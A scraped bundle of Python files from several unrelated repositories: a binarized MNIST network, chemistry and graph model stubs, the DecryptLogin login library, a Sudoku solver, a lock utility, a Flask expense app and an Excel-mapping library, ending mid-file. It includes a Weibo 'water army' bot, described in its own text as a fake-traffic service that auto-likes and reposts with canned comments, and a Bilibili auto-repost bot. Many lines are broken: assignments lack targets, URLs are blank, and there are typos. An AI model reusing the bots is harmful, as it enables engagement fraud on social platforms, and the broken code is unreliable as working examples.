#### File: 0h-n0/NeuralNetworkPhys/ ```python import numpy as np import torch import torch.nn as nn import torch.optim as optim from torch.autograd import Variable import torch.nn.functional as F from torchvision import datasets, transforms class BinaryLinear(nn.Module): def __init__(self, in_size, out_size): super(BinaryLinear, self).__init__() self.in_size = in_size self.out_size = out_size self.fc = nn.Linear(in_size, out_size) self.init_weights() self.set_hook() def init_weights(self): def _init_weights(m): if type(m) == nn.Linear: binary_w = np.random.choice([-1, 1], size=(self.in_size, self.out_size)) binary_b = np.random.choice([-1, 1], size=(self.in_size)) binary_w = binary_w.astype(np.float32) binary_b = binary_b.astype(np.float32) = torch.FloatTensor(binary_w) = torch.FloatTensor(binary_b) self.apply(_init_weights) def set_hook(self): def binarize(m, inputs): w = w = np.where(w > 0, 1, -1) b = b = np.where(b > 0, 1, -1) = \ torch.FloatTensor(w.astype(np.float32)) = \ torch.FloatTensor(b.astype(np.float32)) self.register_forward_pre_hook(binarize) def forward(self, x): return self.fc(x) class BinaryNet(nn.Module): def __init__(self): super(BinaryNet, self).__init__() self.fc1 = BinaryLinear(784, 200) self.fc2 = BinaryLinear(200, 50) self.fc3 = BinaryLinear(50, 10) def forward(self, x): x = x.view(-1, 784) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return F.softmax(x) lr = 0.01 momentum = 0.9 batch_size = 10 epochs = 10 cuda = None kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {} train_loader = datasets.MNIST('../data', train=True, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,)) ])), batch_size=batch_size, shuffle=True, **kwargs) test_loader = datasets.MNIST('../data', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,)) ])), batch_size=batch_size, shuffle=True, **kwargs) model = BinaryNet() optimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum) loss_fn = torch.nn.CrossEntropyLoss(size_average=False) def train(epoch): model.train() for batch_idx, (data, target) in enumerate(train_loader): if cuda: data, target = data.cuda(), target.cuda() data, target = Variable(data), Variable(target) optimizer.zero_grad() output = model(data) loss = loss_fn(output, target) loss.backward() optimizer.step() if batch_idx % 100 == 0: print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format( epoch, batch_idx * len(data), len(train_loader.dataset), 100. * batch_idx / len(train_loader),[0])) for epoch in range(1, epochs + 1): train(epoch) ```
{ "source": "0h-n0/pybiodata", "score": 2 }
#### File: pybiodata/pybiodata/ ```python import requests from .base import AbstractDatabase from .database_urls import PDB_REST_URL, PDB_DOWNLOAD_URL class PDB(AbstractDatabase): def __init__(self, parser): self.args = vars(parser.parse_args()) def run(self): pdb_id = self.args['id'] filename = f'{pdb_id}.pdb' with requests.get(PDB_DOWNLOAD_URL + f'/{filename}', stream=True) as r: r.raise_for_status() with open(filename, 'wb') as f: for chunk in r.iter_content(chunk_size=8192): if chunk: f.write(chunk) return filename @classmethod def set_command_arguments(cls): parser = super().set_command_arguments() parser.add_argument('--id', help='set PDBID') return parser ```
{ "source": "0h-n0/pytorch_chemistry", "score": 2 }
#### File: torch_chemistry/datasets/ ```python from import Dataset import rdkit from import InMemoryDataset class InMemoryRdkitDataset(InMemoryDataset): edge_types = {rdkit.Chem.rdchem.BondType.SINGLE: 0, rdkit.Chem.rdchem.BondType.DOUBLE: 1, rdkit.Chem.rdchem.BondType.TRIPLE: 2, rdkit.Chem.rdchem.BondType.AROMATIC: 3} def __init__(self, root, tranform=None, pre_transform=None, pre_filter=None): super(InMemoryRdkitDataset, self).__init__(root, tranform, pre_transform, pre_filter) def __str__(self): return self.__name__ ``` #### File: nn/conv/ ```python import torch from torch.nn import Parameter from . import GNNConv from ..init import uniform class SGCConv(GNNConv): def __init__(self, in_channels, out_channels, bias=True, **kwargs): pass ``` #### File: nn/metrics/ ```python import torch.nn as nn from ..functional.metric import * class ROCCurve(nn.Module): def __init__(self): super(ROCCurve, self).__init__() def forward(self, pred, target): return roc_curve(pred, target) class ROCAUCScore(nn.Modele): def __init__(self): super(ROCAUCScore, self).__init__() def forward(self, pred, target): return roc_auc_score(pred, target) class AUC(nn.Module): def __init__(self): super(AUC, self).__init__() def forward(self, fpr, tpr): return auc(fpr, tpr) ```
{ "source": "0h-n0/sequential_graph_generation", "score": 3 }
#### File: sequential_graph_generation/models/ ```python import math import torch import torch.nn as nn import torch.distributions as dists import torch.nn.functional as F import torch.nn.utils.rnn as rnn_utils def init_feedforward_weights(dnn: nn.Module, init_mean=0, init_std=1, init_xavier: bool=True, init_normal: bool=True, init_gain: float=1.0): for name, p in dnn.named_parameters(): if 'bias' in name: if 'weight' in name: if init_xavier: if init_normal: nn.init.xavier_normal(, init_gain) else: nn.init.xavier_uniform(, init_gain) else: if init_normal: nn.init.normal(, init_gain) else: nn.init.uniform(, init_gain) class GraphLinear(torch.nn.Module): """Graph Linear layer. This function assumes its input is 3-dimensional. Differently from :class:`chainer.functions.linear`, it applies an affine transformation to the third axis of input `x`. .. seealso:: :class:`torch.nn.Linear` """ def __init__(self, in_features, out_features, *, nonlinearity='sigmoid', init_mean=0, init_std=1, init_xavier: bool=True, init_normal: bool=True, init_gain = None, dropout=0.0, bias=True, ): super(GraphLinear, self).__init__() self.linear = torch.nn.Linear(in_features, out_features, bias) self.out_features = out_features self.nonlinearity = nonlinearity if not init_gain and nonlinearity is not None: init_gain = torch.nn.init.calculate_gain(nonlinearity) else: init_gain = 1 init_feedforward_weights(self.linear, init_mean, init_std, init_xavier, init_normal, init_gain) def __call__(self, x): # (minibatch, atom, ch) s0, s1, s2 = x.size() x = x.view(s0 * s1, s2) x = self.linear(x) x = x.view(s0, s1, self.out_features) return x ```
{ "source": "0honus0/DecryptLogin", "score": 2 }
#### File: DecryptLogin/DecryptLogin/ ```python import warnings from .modules import * warnings.filterwarnings('ignore') '''模拟登录类-直接返回登录后的session''' class Login(): def __init__(self, disable_print_auth=False, **kwargs): if not disable_print_auth: print(self) self.supported_apis = { 'douban': douban().login, 'weibo': weibo().login, 'github': github().login, 'music163': music163().login, 'zt12306': zt12306().login, 'QQZone': QQZone().login, 'QQQun': QQQun().login, 'QQId': QQId().login, 'zhihu': zhihu().login, 'bilibili': bilibili().login, 'toutiao': toutiao().login, 'taobao': taobao().login, 'jingdong': jingdong().login, 'ifeng': ifeng().login, 'sohu': sohu().login, 'zgconline': zgconline().login, 'lagou': lagou().login, 'twitter': twitter().login, 'eSurfing': eSurfing().login, 'tencentvideo': tencentvideo().login, 'renren': renren().login, 'w3cschool': w3cschool().login, 'fishc': fishc().login, 'youdao': youdao().login, 'baidupan': baidupan().login, 'stackoverflow': stackoverflow().login, 'codalab': codalab().login, 'pypi': pypi().login, 'douyu': douyu().login, 'migu': migu().login, 'qunar': qunar().login, 'mieshop': mieshop().login, 'mpweixin': mpweixin().login, 'baidutieba': baidutieba().login, 'dazhongdianping': dazhongdianping().login, 'jianguoyun': jianguoyun().login, 'cloud189': cloud189().login, 'qqmusic': qqmusic().login, 'ximalaya': ximalaya().login, 'icourse163': icourse163().login, 'xiaomihealth': xiaomihealth().login, } for key, value in self.supported_apis.items(): setattr(self, key, value) '''str''' def __str__(self): return 'Welcome to use DecryptLogin!\nYou can visit for more details.' '''返回对应网站的客户端''' class Client(): def __init__(self, disable_print_auth=False, **kwargs): if not disable_print_auth: print(self) self.supported_clients = { 'bilibili': BiliBiliClient, 'weibo': WeiboClient, 'douban': DoubanClient, 'github': GithubClient, 'music163': Music163Client, 'zt12306': Zt12306Client, 'QQZone': QQZoneClient, 'QQId': QQIdClient, 'QQQun': QQQunClient, 'zhihu': ZhihuClient, 'taobao': TaobaoClient, 'toutiao': ToutiaoClient, 'jingdong': JingdongClient, 'ifeng': IfengClient, 'sohu': SohuClient, 'zgconline': ZgconlineClient, 'twitter': TwitterClient, 'renren': RenRenClient, 'lagou': LagouClient, 'eSurfing': eSurfingClient, 'w3cschool': W3CSchoolClient, 'fishc': FishCClient, 'youdao': YoudaoClient, 'stackoverflow': StackoverflowClient, 'baidupan': BaiduPanClient, 'douyu': DouyuClient, 'codalab': CodaLabClient, 'pypi': PyPiClient, 'migu': MiguClient, 'qunar': QunarClient, 'xiaomihealth': XiaomiHealthClient, 'mieshop': MieShopClient, 'mpweixin': MpweixinClient, 'baidutieba': BaiduTiebaClient, 'dazhongdianping': DazhongdianpingClient, 'jianguoyun': JianguoyunClient, 'cloud189': Cloud189Client, 'qqmusic': QQMusicClient, 'ximalaya': XimalayaClient, 'icourse163': Icourse163Client, 'tencentvideo': TencentVideoClient, } for key, value in self.supported_clients.items(): setattr(self, key, value) '''str''' def __str__(self): return 'Welcome to use DecryptLogin!\nYou can visit for more details.' ``` #### File: examples/bilibililottery/ ```python import re import time import random import argparse from tqdm import tqdm from DecryptLogin import login '''命令行参数解析''' def parseArgs(): parser = argparse.ArgumentParser(description='B站监控关注的UP主并自动转发抽奖') parser.add_argument('--username', dest='username', help='用于存储历史cookies的唯一标识ID', type=str, required=False) parser.add_argument('--interval', dest='interval', help='查询UP主的动态的间隔时间', type=int, default=1800, required=False) args = parser.parse_args() return args '''B站监控关注的UP主并自动转发抽奖''' class BiliBiliLottery(): def __init__(self, username='charlespikachu', time_interval=1800, **kwargs): self.username = username self.time_interval = time_interval self.comments = ['日常当分母', '就想简简单单中个奖QAQ', '啊啊啊啊啊, 让我中一次吧 T_T', '天选之子'] self.headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36', } '''运行''' def run(self): # 模拟登录 client = login.Client() bili = client.bilibili(reload_history=True) infos_return, session = bili.login(self.username, '微信公众号: Charles的皮卡丘', 'scanqr') # 获得关注列表 self.logging('正在获取您的关注列表') followings_ids = self.getfollowings(session, infos_return) # 获得UP主当前的动态 self.logging('正在获取您的关注列表里的UP主的所有动态') followings_infos = {} for userid in followings_ids: followings_infos[userid] = self.getupdates(infos_return, userid, session) # 监控新的动态 self.logging('开始监控是否有新的抽奖信息发布') while True: time.sleep(self.time_interval) self.logging('开始检测是否有新的抽奖信息发布') for userid in tqdm(followings_ids): updates_old = followings_infos.pop(userid) updates_latest = self.getupdates(infos_return, userid, session) for dynamic_id in updates_latest.keys(): if dynamic_id not in updates_old: desp = updates_latest[dynamic_id] if '#互动抽取#' in desp: result = self.forwardupdate(session, infos_return, dynamic_id) self.logging(f'检测到有新的抽奖信息发布, 已经尝试转发, 返回的结果为{result}') followings_infos[userid] = updates_latest '''logging''' def logging(self, msg, tip='INFO'): print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}') '''转发动态''' def forwardupdate(self, session, infos_return, dynamic_id): url = '' data = { 'uid': infos_return['data']['mid'], 'dynamic_id': dynamic_id, 'content' : random.choice(self.comments), 'ctrl': '[{"data":"5581898","location":2,"length":4,"type":1},{"data":"10462362","location":7,"length":5,"type":1},{"data":"1577804","location":13,"length":4,"type":1}]', 'csrf_token': session.cookies.get('bili_jct') } response =, data=data, headers=self.headers) return response.json() '''获得UP主的动态''' def getupdates(self, infos_return, host_uid, session): url = f'{infos_return["data"]["mid"]}&host_uid={host_uid}&offset_dynamic_id=0&need_top=1&platform=web' response = session.get(url, headers=self.headers) response_json, updates = response.json(), {} for card in response_json['data']['cards']: dynamic_id = card['desc']['dynamic_id'] try: desp = re.findall(r'"description":"(.*?)"', card['card'])[0] except: desp = '' updates[dynamic_id] = desp return updates '''获得关注列表''' def getfollowings(self, session, infos_return): url = '' params = { 'vmid': infos_return['data']['mid'], 'pn': '1', 'ps': '20', 'order': 'desc', 'order_type': 'attention', 'jsonp': 'jsonp', } response = session.get(url, params=params, headers=self.headers) total = response.json()['data']['total'] followings_ids, page = [], 1 while True: for item in response.json()['data']['list']: followings_ids.append(item['mid']) if len(followings_ids) >= total: break page += 1 params['pn'] = str(page) response = session.get(url, params=params, headers=self.headers) return followings_ids '''run''' if __name__ == '__main__': args = parseArgs() client = BiliBiliLottery(username=args.username, time_interval=args.interval) ``` #### File: examples/weibowater/ ```python import re import time import random import argparse from DecryptLogin import login '''命令行参数解析''' def parseArgs(): parser = argparse.ArgumentParser(description='一个简单的微博水军机器人') parser.add_argument('--username', dest='username', help='微博登录用的账户名', type=str, required=False) parser.add_argument('--password', dest='password', help='微博登录用的密码', type=str, required=False) parser.add_argument('--targetid', dest='targetid', help='想要流量造假服务的明星微博ID, 例如: 1776448504', type=str, required=True) args = parser.parse_args() return args '''一个简单的微博水军机器人''' class WeiboWater(): def __init__(self, username='charlespikachu', password='微信公众号: <PASSWORD>', targetid=None, **kwargs): self.username = username self.password = password self.targetid = targetid self.comments = ['转发微博', '太赞了', '真棒', '挺好的', '宣传一下'] self.headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36', } '''运行''' def run(self): # 模拟登录 client = login.Client() weibo = infos_return, session = weibo.login(self.username, self.password, 'mobile') # 获取目标用户最新发表的一条微博 url = f'{self.targetid}?uid={self.targetid}&luicode=10000011&lfid=231093_-_selffollowed' session.get(url, headers=self.headers) containerid = re.findall(r'fid%3D(\d+)%26', str(session.cookies))[0] url = f'{self.targetid}&containerid={containerid}' response = session.get(url, headers=self.headers) for item in response.json()['data']['tabsInfo']['tabs']: if item['tab_type'] == 'weibo': containerid = item['containerid'] url = f'{self.targetid}&containerid={containerid}' response = session.get(url, headers=self.headers) cards = response.json()['data']['cards'] for card in cards: if card['card_type'] == 9: self.logging(f'选择的用户微博为 >>>\n{card}') break selected_card = card # 自动点赞 card_id = selected_card['mblog']['id'] response = session.get('') st = response.json()['data']['st'] flag, response_json = self.starweibo(session, st, card_id) if flag: self.logging(f'自动点赞ID为{card_id}的微博成功') else: self.logging(f'自动点赞ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}') # 自动转发+评论 flag, response_json = self.repost(session, st, card_id) if flag: self.logging(f'自动转发+评论ID为{card_id}的微博成功') else: self.logging(f'自动转发+评论ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}') '''自动转发+评论''' def repost(self, session, st, card_id): url = '' data = { 'id': card_id, 'content': random.choice(self.comments), 'dualPost': 1, 'mid': card_id, 'st': st, } response =, data=data) if 'ok' in response.json() and str(response.json()['ok']) == '1': return True, response.json() return False, response.json() '''自动点赞''' def starweibo(self, session, st, card_id): session.headers.update({ 'origin': '', 'referer': f'{self.targetid}?uid={self.targetid}', }) data = { 'id': card_id, 'attitude': 'heart', 'st': st, '_spr': 'screen:1536x864', } url = '' response =, data=data) if 'ok' in response.json() and str(response.json()['ok']) == '1': return True, response.json() return False, response.json() '''logging''' def logging(self, msg, tip='INFO'): print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}') '''run''' if __name__ == '__main__': args = parseArgs() client = WeiboWater(username=args.username, password=<PASSWORD>, targetid=args.targetid) ```
{ "source": "0hsn/problem-per-day", "score": 4 }
#### File: 0hsn/problem-per-day/ ```python from pprint import pprint def repeatedString(s, n): if len(s) == 1: return n if s == 'a' else 0 if 'a' not in s: return 0 rpt = int(n / len(s)) if (n % len(s) == 0) else int(n / len(s)) + 1 ss = s * rpt ss = ss[:n] cnt = 0 for c in ss: if c == 'a': cnt+=1 return cnt if __name__ == '__main__': print(repeatedString('b', 10000000000000000000000)) ```
{ "source": "0Hughman0/ezlock", "score": 4 }
#### File: ezlock/ezlock/ ```python from pathlib import Path import os import time import atexit class LockError(Exception): pass class Lock: def __init__(self, path='.lock', release_on_exit=False): """ Lock object that keeps track of a file found at `self.path`. If there is a file found at `self.path`, the lock is considered... locked! Parameters ========== path : str, Path path to write the lock file to (will be converted to `pathlib.Path`). Defaults to '.lock'. """ self.path = Path(path) self._do_release_on_exit = None self.release_on_exit = release_on_exit @property def name(self): """ name written to lock to prove ownership """ return 'pid:{}, obj:{}'.format(os.getpid(), id(self)) @property def locked(self): """ Does the lock-file at `self.path` exist? """ return self.path.exists() @property def mine(self): """ Was the lock created by this object? """ try: return self.path.read_text() == except FileNotFoundError: raise LockError("Attempted to check ownership on lock that doesn't exist") def acquire(self, force=False): """ Create the lock-file, and stamp on it that it was made by me! Parameters ========== force : bool If the lock already exists, force switching ownership to me so `self.mine==True`. Defaults to False """ if self.locked and not force: raise LockError("Attempted to acquire on already locked lock!") self.path.write_text( def release(self, force=False, rerelease=True): """ Release the lock. Will get upset if the lock isn't `self.mine` but can override by setting `force=True`. Parameters ========== force : bool force releasing the lock, even if not `self.mine`. (default `False`) rerelease : when `True` will not complain if attempting to release and already released lock. (default `True`) Returns ======= name : str the name of the lock that was just released (None if no lock was released) """ if not self.locked: if not rerelease: raise LockError("Attempted to release an already released lock") return None if not self.mine and not force: raise LockError("Attempted to release a lock that wasn't mine, can set `force=True`") name = self.path.read_text() os.remove(self.path.as_posix()) return name @property def release_on_exit(self): return self._do_release_on_exit @release_on_exit.setter def release_on_exit(self, do): if do: atexit.register(self.release) else: atexit.unregister(self.release) self._do_release_on_exit = do def wait(self, dt=0.01): """ Wait until lock is released. Parameters ========== dt : float how long to wait between checking for `self.locked` """ while self.locked: time.sleep(dt) def __enter__(self): self.acquire() def __exit__(self, exception_type, exception_value, traceback): self.release() def __bool__(self): return self.locked ```
{ "source": "0Hughman0/housenet", "score": 2 }
#### File: housenet/housenet/ ```python from decimal import Decimal from io import BytesIO from flask import request, render_template, send_file, json from housenet import base_app from housenet.database import db from housenet.database.database import Housemate, Cashflow, Transaction @base_app.route('/') def home(): housemates = Housemate.query.all() data = [] for housemate in housemates: data.append(tuple((, housemate.current_chore.title))) return render_template("home.html", title="Home", data=data) @base_app.route("/profile/<name>", methods=["POST", "GET"]) def profile(name): housemate = Housemate.query.get(name) if not housemate: return "<a>You're drunk, go </a><a href='/'>home</a>" if request.method == "POST": change_dict = request.form.copy() reason = change_dict.pop("reason") for payment_type, payments in change_dict.items(): payments_list = (payment for payment in json.loads(payments) if payment['value']) for payment in payments_list: debt = Cashflow.query.filter(Cashflow.from_name ==, Cashflow.to_name == payment["name"]).first() if not debt: continue amount = Decimal(payment['value']) # if payment_type == "your_owed": # Creates confusion about who put what in # debt = debt.mirror # amount = -amount transaction = debt.add(amount) transaction.reason = reason db.session.add(transaction) db.session.commit() current_chore = housemate.current_chore debts = (cashflow.as_tuple for cashflow in housemate.out_flow) debits = (cashflow.as_tuple for cashflow in housemate.in_flow) quits = (cashflow.as_tuple for cashflow in housemate.quits) return render_template("profile.html", title=name, current_chore=current_chore, debts=debts, debits=debits, quits=quits) @base_app.route("/transactions_history") def transactions(): return render_template("transactions.html", title="Transactions") @base_app.route("/api/get_transactions") def get_transactions(): all_transactions = Transaction.query.all() return json.dumps({"data": tuple(transaction.to_row() for transaction in all_transactions)}) @base_app.route("/api/ical/<name>") def get_ical(name): housemate = Housemate.query.get(name) return send_file(BytesIO(housemate.get_ical_feed()), attachment_filename="{}_chores.ics".format(name), as_attachment=True) ``` #### File: 0Hughman0/housenet/ ```python from app_factory import create_app import unittest """ To be implemented... probably """ app, db = create_app("DEBUG") app.testing = True class HousenetBaseTestCase: def setUp(self): = app.test_client() def tearDown(self): pass def test_add_amount(self):"/profile/Person%201/", data={"t": 1}) class CliTestsCase(HousenetBaseTestCase, unittest.TestCase): def test_save_db(self): pass class TestHousenetInit(unittest.TestCase): def setUp(self): pass if __name__ == '__main__': unittest.main() ```
{ "source": "0Hughman0/sudokugh", "score": 3 }
#### File: 0Hughman0/sudokugh/ ```python import numpy as np import logging import sys logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) RC_MASK = np.repeat(True, 9) POSSIBLES = set(range(1, 10)) vals = np.vectorize(lambda cell: cell.val) class Cell: def __init__(self, grid, irow, icol): self.possibles = POSSIBLES.copy() self.grid = grid self.irow = irow self.icol = icol self._row_mask = RC_MASK.copy() self._col_mask = RC_MASK.copy() self._box_mask = RC_MASK.copy().reshape(3, 3) self._row_mask[self.icol] = False self._col_mask[self.irow] = False self._box_mask[self.irow - self.irbox, self.icol - self.icbox] = False @property def irbox(self): return self.irow - self.irow % 3 @property def icbox(self): return self.icol - self.icol % 3 @property def box(self): return self.grid[self.irbox:self.irbox+3, self.icbox:self.icbox+3][self._box_mask] @property def row(self): return self.grid[self.irow, :][self._row_mask] @property def col(self): return self.grid[:, self.icol][self._col_mask] @property def fixed(self): return len(self) <= 1 @property def val(self): if self.fixed: return list(self.possibles)[0] else: return -1 def fix(self, val): self.possibles = {val} def __len__(self): return self.possibles.__len__() def __repr__(self): return f"<Cell {self.irow, self.icol} {self.possibles}>" def __hash__(self): return (self.irow, self.icol, self.possibles).__hash__() class Grid: def __init__(self): self.grid = np.array([[Cell(self, row, col) for col in range(9)] for row in range(9)]) def __getitem__(self, irowcol): irow, icol = irowcol return self.grid[irow, icol] @classmethod def from_string(cls, grid_string): g = grid_string.strip() cleaned = [l.split(',') for l in g.replace('|', '').replace(' ', '0').split('\n')] arrayed = np.array(cleaned).astype(int) return cls.from_array(arrayed) @classmethod def from_input(cls): o = cls() for i in range(9): print("New row\n", i+1) for j in range(9): if j % 3: print("New Box\n") v = input(f"Enter value for cell {i + 1, j + 1}, blank for no value") if v: o[i, j].fix(int(v)) return o @classmethod def from_array(cls, array): """ 0 or -1 for blank squares! """ o = cls() for row, grow in zip(array, o.grid): for num, cell in zip(row, grow): if num in POSSIBLES: cell.fix(num) return o def as_array(self): return vals(self.grid) def copy(self): return self.from_array(self.as_array()) @property def broken(self): return any(len(cell.possibles) <= 0 for cell in self.grid.flatten()) def ifixed(self, collection=None): if collection is None: collection = self.grid for cell in collection.flatten(): if cell.fixed: yield cell def iunfixed(self, collection=None): if collection is None: collection = self.grid for cell in collection.flatten(): if not cell.fixed: yield cell def find_required(self, collection): required = POSSIBLES.copy() for fixed in self.ifixed(collection): required -= fixed.possibles return required def count_fixed(self, collection=None): if collection is None: collection = self.grid return sum(1 for cell in self.ifixed(collection)) def nearest_complete(self): all_unfixed = list(self.iunfixed()) all_unfixed.sort(key=lambda cell: (len(cell.possibles), # smallest number of candidates (8 * 3) - sum(self.count_fixed(collection) for collection in (cell.row, cell.col, # largest amount of additional info! return all_unfixed def gen_targets(self): while not all(cell.fixed for cell in self.grid.flatten()): nearest_complete = self.nearest_complete() count = self.count_fixed() for cell in nearest_complete: yield cell if self.count_fixed() != count: # New fixed cells, need to start again! break else: raise RuntimeError("Hit roadblock, all cells presented") # got to the end and made no progress def display(self): array = self.as_array() return np.where(array != -1, array, ' ').astype(str) def find_possibles(self, cell): eliminated = set() for collection in (cell.row, cell.col, for other in self.ifixed(collection): eliminated.update(other.possibles) return POSSIBLES ^ eliminated def update_possibles(self): for unfixed in self.iunfixed(): unfixed.possibles = self.find_possibles(unfixed) if self.broken: raise RuntimeError("Impossible to solve cell found") def try_elimination(self, unfixed): for collection in (unfixed.row, unfixed.col, possibles = self.find_required(collection) & unfixed.possibles alternatives = self.iunfixed(collection) for alternative in alternatives: possibles -= alternative.possibles if len(possibles) == 1: unfixed.possibles = possibles return True return False def solve(self):"Performing initial reduction") i = 0 self.update_possibles()"Eliminating possibilities") for i, target in enumerate(self.gen_targets()):"Trying to deduce {target}") if self.try_elimination(target):"Success! {target.val}")"Updating consequences") self.update_possibles() else:"No luck!")"Solved") return i + 1 def deepsolve(self, pmin=1/9 ** 3, _p=1.0): try: i = self.solve()"Deep solved") return i except RuntimeError:"Got stuck, attempting to branch") nearest_complete = self.nearest_complete() for iba, candidate in enumerate(nearest_complete): _p = (1 / len(candidate.possibles) * _p) if _p < pmin: raise RuntimeError("Chance of success judged too low") for possible in candidate.possibles: branch_grid = self.copy() branch_grid[candidate.irow, candidate.icol].fix(possible) try:"Entering a branch for {candidate} using {possible}") complete = branch_grid.deepsolve(pmin=pmin, _p=_p) self.from_array(complete.as_array()) return complete except Exception as e:"Deadend reached due to {e}") del branch_grid if __name__ == '__main__': from tests import T1, T2, T3, T4 g1 = Grid.from_array(T1) g2 = Grid.from_array(T2) g3 = Grid.from_array(T3) g4 = Grid.from_array(T4) ```
{ "source": "0Hughman0/xl_link", "score": 3 }
#### File: xl_link/xl_link/ ```python import pandas as pd try: from import ExcelFormatter except ImportError: from pandas.formats.format import ExcelFormatter from import _stringify_path from .xl_types import XLCell from .chart_wrapper import create_chart, SINGLE_CATEGORY_CHARTS, CATEGORIES_REQUIRED_CHARTS def get_xl_ranges(frame_index, frame_columns, sheet_name='Sheet1', columns=None, header=True, index=True, index_label=None, startrow=0, startcol=0, merge_cells=True): """ Deduces location of data_range, index_range and col_range within excel spreadsheet, given the parameters provided. Does not require an actual DataFrame, which could be useful! Parameters ---------- frame_index: Pandas Index or Array-like to determine location of index within spreadsheet. frame_columns: Pandas Index or Array-like used to determine location of column within spreadsheet. excel_writer : string or ExcelWriter sheet_name : str default ‘Sheet1’, Name of sheet which will contain DataFrame columns : sequence optional, Columns to write header : bool or list of strings, default True Write out the column names. If a list of strings is given it is assumed to be aliases for the column names index : bool default True. Write row names (index) index_label : str or sequence default None. Column label for index column(s) if desired. If None is given, and header and index are True, then the index names are used. A sequence should be given if the DataFrame uses MultiIndex. startrow : int upper left cell row to dump data frame startcol : int upper left cell column to dump data frame merge_cells : bool default True. Write MultiIndex and Hierarchical Rows as merged cells. Returns ------- data_range, index_range, col_range : XLRange Each range represents where the data, index and columns can be found on the spreadsheet empty_f : DatFrame an empty DataFrame with matching Indices. """ empty_f = pd.DataFrame(index=frame_index, columns=frame_columns) formatter = ExcelFormatter(empty_f, cols=columns, header=header, index=index, index_label=index_label, merge_cells=merge_cells) excel_header = list(formatter._format_header()) col_start, col_stop = excel_header[0], excel_header[-1] col_start_cell = XLCell(col_stop.row + startrow, col_start.col + startcol, sheet_name) col_stop_cell = XLCell(col_stop.row + startrow, col_stop.col + startcol, sheet_name) if isinstance(empty_f.index, pd.MultiIndex): col_start_cell = col_start_cell.translate(0, 1) col_range = col_start_cell - col_stop_cell body = list(formatter._format_body()) if or index_label: body.pop(0) # gets rid of index label cell that comes first! index_start_cell = XLCell(body[0].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name) index_stop_cell = XLCell(body[-1].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name) index_range = index_start_cell - index_stop_cell data_start_cell = XLCell(index_start_cell.row, col_start_cell.col, sheet_name) data_stop_cell = XLCell(index_stop_cell.row, col_stop_cell.col, sheet_name) data_range = data_start_cell - data_stop_cell return data_range, index_range, col_range, empty_f def write_frame(f, excel_writer, to_excel_args=None): """ Write a Pandas DataFrame to excel by calling to_excel, returning an XLMap, that can be used to determine the position of parts of f, using pandas indexing. Parameters ---------- f : DataFrame Frame to write to excel excel_writer : str or ExcelWriter Path or existing Excel Writer to use to write frame to_excel_args : dict Additional arguments to pass to DataFrame.to_excel, see docs for DataFrame.to_excel Returns ------- XLMap : Mapping that corresponds to the position in the spreadsheet that frame was written to. """ xlf = XLDataFrame(f) return xlf.to_excel(excel_writer, **to_excel_args) def _mapper_to_xl(value): """ Convert mapper frame result to XLRange or XLCell """ if isinstance(value, XLCell): return value if isinstance(value, pd.Series): return value.values[0] - value.values[-1] if isinstance(value, pd.DataFrame): return value.values[0, 0] - value.values[-1, -1] raise TypeError("Could not conver {} to XLRange or XLCell".format(value)) class _SelectorProxy: """ Proxy object that intercepts calls to Pandas DataFrame indexers, and re-interprets result into excel locations. Parameters ---------- mapper_frame: DataFrame with index the same as the DataFrame it is representing, however, each cell contains the location they sit within the spreadsheet. selector_name: str name of the indexer SelectorProxy is emulating, i.e. loc, iloc, ix, iat or at Notes ----- Only implements __getitem__ behaviour of indexers. """ def __init__(self, mapper_frame, selector_name): self.mapper_frame = mapper_frame self.selector_name = selector_name def __getitem__(self, key): val = getattr(self.mapper_frame, self.selector_name)[key] return _mapper_to_xl(val) class XLMap: """ An object that maps a Pandas DataFrame to it's positions on an excel spreadsheet. Provides access to basic pandas indexers - __getitem__, loc, iloc, ix, iat and at. These indexers are modified such that they return the cell/ range of the result. The idea is should make using the data in spreadsheet easy to access, by using Pandas indexing syntax. For example can be used to create charts more easily (see example below). Notes ----- Recommended to not be created directly, instead via, XLDataFrame.to_excel. XLMap can only go 'one level deep' in terms of indexing, because each indexer always returns either an XLCell, or an XLRange. The only workaround is to reduce the size of your DataFrame BEFORE you call write_frame. This limitation drastically simplifies the implementation. Examples of what WON'T WORK: >>> xlmap.loc['Mon':'Tues', :].index AttributeError: 'XLRange' object has no attribute 'index' >>> xlmap.index['Mon':'Tues'] # Doesn't work because index is not a Pandas Index, but an XLRange. TypeError: unsupported operand type(s) for -: 'str' and 'int' Parameters ---------- data_range, index_range, column_range : XLRange that represents the region the DataFrame's data sits in. f : DataFrame that has been written to excel. Attributes ---------- index : XLRange range that the index column occupies columns : XLRange range that the frame columns occupy data : XLRange range that the frame data occupies writer : Pandas.ExcelWriter writer used to create spreadsheet sheet : object sheet object corresponding to sheet the frame was written to, handy if you want insert a chart into the same sheet Examples -------- >>> calories_per_meal = XLDataFrame(columns=("Meal", "Mon", "Tues", "Weds", "Thur"), data={'Meal': ('Breakfast', 'Lunch', 'Dinner', 'Midnight Snack'), 'Mon': (15, 20, 12, 3), 'Tues': (5, 16, 3, 0), 'Weds': (3, 22, 2, 8), 'Thur': (6, 7, 1, 9)}) >>> calories_per_meal.set_index("Meal", drop=True, inplace=True) Write to excel >>> writer = pd.ExcelWriter("Example.xlsx", engine='xlsxwriter') >>> xlmap = calories_per_meal.to_excel(writer, sheet_name="XLLinked") # returns the XLMap Create chart with XLLink >>> workbook = >>> xl_linked_sheet = 